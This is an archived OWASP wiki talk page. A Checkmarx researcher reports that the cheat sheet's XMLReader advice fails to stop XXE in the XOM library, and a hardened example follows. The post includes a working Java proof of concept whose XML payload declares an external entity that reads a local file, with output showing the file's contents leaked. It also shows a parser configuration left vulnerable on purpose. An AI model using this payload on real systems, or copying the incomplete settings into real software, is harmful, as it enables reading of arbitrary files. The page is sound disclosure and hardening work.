This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org
Talk:XML External Entity (XXE) Prevention Cheat Sheet
The following code suffers from XXE despite the OWASP XMLReader recommendations stating that these setFeature calls would resolve it.
However, this is not true for XOM.nu (tested on version 1.2.5), a third-party XML plugin. I don't know how popular it is, but it is used by Jenkins. I am not implying Jenkins is vulnerable, merely that a lib it uses doesn't have proper OWASP usage recommendations.
Anyway, assuming the content of c:\test.txt is "This is TEXT inside the file C:\test.txt":
    import java.io.InputStream;
    import org.apache.commons.io.IOUtils;
    import org.xml.sax.XMLReader;
    import org.xml.sax.helpers.XMLReaderFactory;
    import nu.xom.*;

    public class helloworld {
        public static void main(String[] args) throws Exception {
            // To get this to run, the file c:\test.txt must exist and have content.
            // Alternatively, change the path in <!ENTITY xxe SYSTEM "file:///[file]">
            String newline = System.getProperty("line.separator");
            String xml = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>" + newline
                    + "<!DOCTYPE bar [" + newline
                    + "<!ENTITY xxe SYSTEM \"file:///c:/test.txt\">" + newline
                    + "]>" + newline
                    + "<book>" + newline
                    + "<author>&xxe;</author>" + newline
                    + "<isbn>11112222333</isbn>" + newline
                    + "<title>The Great Big Useless Book of XMLs</title>" + newline
                    + "</book>";

            // Vulnerable XOM Parser: the SAX features below are set as recommended,
            // but the DOCTYPE is still allowed, so the entity is still resolved.
            XMLReader xerces = XMLReaderFactory.createXMLReader();
            //xerces.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
            xerces.setFeature("http://xml.org/sax/features/external-general-entities", false);
            xerces.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
            xerces.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
            Builder b = new Builder(xerces);
            InputStream is2 = IOUtils.toInputStream(xml, "UTF-8");
            Document d = b.build(is2);
            System.out.println("XOM Reader: " + d.getValue());
        }
    }
Output:
    XOM Reader:
    This is TEXT inside the file C:\test.txt
    11112222333
    The Great Big Useless Book of XMLs
However, by uncommenting the line

    xerces.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);

a 'nu.xom.ParsingException' is thrown for this XML, preventing exploitation.
This leads us (Checkmarx Research Group) to believe the recommendations in OWASP for XMLReader are partial. We actually advise removing the direct, explicit recommendations entirely and demanding that devs adhere to specific platform best practices and documentation instead.
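For reference, here is the hardened counterpart of the snippet above as an added example; it is not code from the post, from XOM or from OWASP. It assumes XOM 1.2.x on a Xerces-backed XMLReader, and the entity path in the constructed sample is a placeholder. The helper disallows the DOCTYPE outright (the setting the post found actually stops XOM) and keeps the entity features off as defence in depth, then shows a DOCTYPE-bearing document being rejected while a plain one still parses.

```java
import java.io.StringReader;
import nu.xom.Builder;
import nu.xom.Document;
import nu.xom.ParsingException;
import org.xml.sax.XMLReader;
import org.xml.sax.helpers.XMLReaderFactory;

public class HardenedXom {
    // XOM Builder on top of a Xerces XMLReader with DOCTYPE declarations disallowed.
    // The three entity/DTD features alone were not enough for XOM in the post's test,
    // so they are kept only as defence in depth behind disallow-doctype-decl.
    static Builder hardenedBuilder() throws Exception {
        XMLReader reader = XMLReaderFactory.createXMLReader();
        reader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        reader.setFeature("http://xml.org/sax/features/external-general-entities", false);
        reader.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        reader.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        return new Builder(reader);
    }

    // Returns the document's text content, or null when the parser rejected the input.
    static String parseOrReject(String xml) throws Exception {
        try {
            Document d = hardenedBuilder().build(new StringReader(xml));
            return d.getValue();
        } catch (ParsingException e) {
            // Any DOCTYPE, and therefore any entity declaration, ends up here
            // before a single entity reference is resolved.
            return null;
        }
    }

    public static void main(String[] args) throws Exception {
        String nl = System.getProperty("line.separator");
        // Constructed sample with the same shape as the post's document (placeholder path).
        String withDoctype = "<?xml version=\"1.0\"?>" + nl
                + "<!DOCTYPE bar [<!ENTITY xxe SYSTEM \"file:///PLACEHOLDER/test.txt\">]>" + nl
                + "<book><author>&xxe;</author><isbn>11112222333</isbn></book>";
        // Constructed sample without any DOCTYPE: this one must still parse.
        String plain = "<book><author>Anonymous</author><isbn>11112222333</isbn></book>";

        System.out.println("with DOCTYPE -> " + parseOrReject(withDoctype)); // rejected by the DOCTYPE check
        System.out.println("plain        -> " + parseOrReject(plain));       // parses normally
    }
}
```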